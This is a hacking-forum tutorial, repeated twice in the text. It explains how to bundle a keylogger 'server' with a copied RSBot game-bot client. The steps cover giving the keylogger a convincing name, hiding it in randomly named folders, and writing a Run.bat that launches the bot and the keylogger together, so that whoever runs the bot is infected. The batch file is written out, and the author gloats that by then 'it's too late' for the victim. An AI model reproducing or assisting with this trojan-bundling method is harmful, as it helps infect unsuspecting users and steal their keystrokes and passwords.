Hey guys,
So, when I started off with all this "Hacking", I was fine up until I had made the key logger. However, I had absolutely no clue over what to do with the server after I'd made it.
Well, of course there was binding, but being a beginner, i wasn't exactly going to be able to do this over night. So I used what knowledge I had (And some help from a friend, I did this:
Step 1.
Go to Powerbot.org and download their client (click here for quick download).
Step 2.
Go to "My Documents" and copy the RSBot folder onto your desktop (So you can easily access it, but also so you can keep your own version).
Step 3.
Go into this new RSBot folder, and make a new Sub folder called "Data". Inside here, paste the most recent RSBot client, which you got from the download.
Step 4.
Get your server, call it whatever you want (For this example, we'll call the server "ServerX.exe", but I recommend a name which sounds convincing, such as "Precompiler", or "ScriptRunner"), and paste it into a reasonably concealed place, perhaps creating a few extra folders, with random names. For this example, the server will be in the folder "Cache".
Step 5.
Open up notepad, and in notepad put this text:
This starts up the RSBot client.
This starts up your Server. If it is working properly, a cmd screen will flash up. Even if your victim notices that, it's too late for them :awe: . If you have put your server somewhere other than "Cache", then put that instead of Cache in the coding. It must be spelt EXACTLY the same as the folders you have put it in.
Save this as "Run.bat" into the RSBot copy on your desktop.
This works for anything. Instead of it being the RSBot client, you could use another program, and simply edit the Run.bat file to suit you!
Hope this helps a few people out who don't really know what to do
~Neo
Rate/Hate/Masturbate!!
P.S. I don't know if this is someone else's method, but if it is, please say and i'll give you credit. My friend simply told me about it a few months ago.
So, when I started off with all this "Hacking", I was fine up until I had made the key logger. However, I had absolutely no clue over what to do with the server after I'd made it.
Well, of course there was binding, but being a beginner, i wasn't exactly going to be able to do this over night. So I used what knowledge I had (And some help from a friend, I did this:
Step 1.
Go to Powerbot.org and download their client (click here for quick download).
Step 2.
Go to "My Documents" and copy the RSBot folder onto your desktop (So you can easily access it, but also so you can keep your own version).
Step 3.
Go into this new RSBot folder, and make a new Sub folder called "Data". Inside here, paste the most recent RSBot client, which you got from the download.
Step 4.
Get your server, call it whatever you want (For this example, we'll call the server "ServerX.exe", but I recommend a name which sounds convincing, such as "Precompiler", or "ScriptRunner"), and paste it into a reasonably concealed place, perhaps creating a few extra folders, with random names. For this example, the server will be in the folder "Cache".
Step 5.
Open up notepad, and in notepad put this text:
Code:
@echo off
START Data/Rsbot-231.jar
START Cache/ServerX.exe
Code:
START Data/Rsbot-231.jar
Code:
START Cache/ServerX.exe
Save this as "Run.bat" into the RSBot copy on your desktop.
This works for anything. Instead of it being the RSBot client, you could use another program, and simply edit the Run.bat file to suit you!
Hope this helps a few people out who don't really know what to do
~Neo
Rate/Hate/Masturbate!!
P.S. I don't know if this is someone else's method, but if it is, please say and i'll give you credit. My friend simply told me about it a few months ago.